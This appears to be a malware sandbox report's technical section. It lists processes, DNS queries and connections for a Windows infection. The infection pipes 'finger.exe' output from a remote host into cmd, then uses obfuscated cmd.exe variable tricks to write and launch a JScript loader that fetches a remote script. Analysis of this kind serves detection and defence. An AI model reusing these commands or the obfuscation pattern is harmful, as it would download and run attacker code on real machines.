Technical Information
- '<SYSTEM32>\finger.exe' ok@5sxktawaa3.estilotransportes.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\RxW.js"
- C:\users\public\rxw.js
- '5s########.estilotransportes.xyz':79
- '6h####.xkqwditozis.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '5s########.estilotransportes.xyz':79
- 'cl###flare.com':443
- DNS ASK 5s########.estilotransportes.xyz
- DNS ASK 6h####.xkqwditozis.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@5sxktawaa3.estilotransportes.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set RUYD=.j&&sET MMWUA=veDl4areDl4 a =eDl4 'sceDl4rieDl4pteDl4:'; b =eDl4 'heDl4TtPeDl4:'; GeDl4eteDl4ObjeDl4eceDl4t(eDl4a+b+'&&sET Y0R5=XPWRPXPWRP6haiew.xkqwditozis.xyzXPWRP?1XPWRP')&&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p IY5UR="%MMWUA:eDl4=%%Y0R5:XPWRP=/%" 0<nul 1>C:\Users\Public\RxW%RUYD%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\RxW%RUYD%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\RxW.js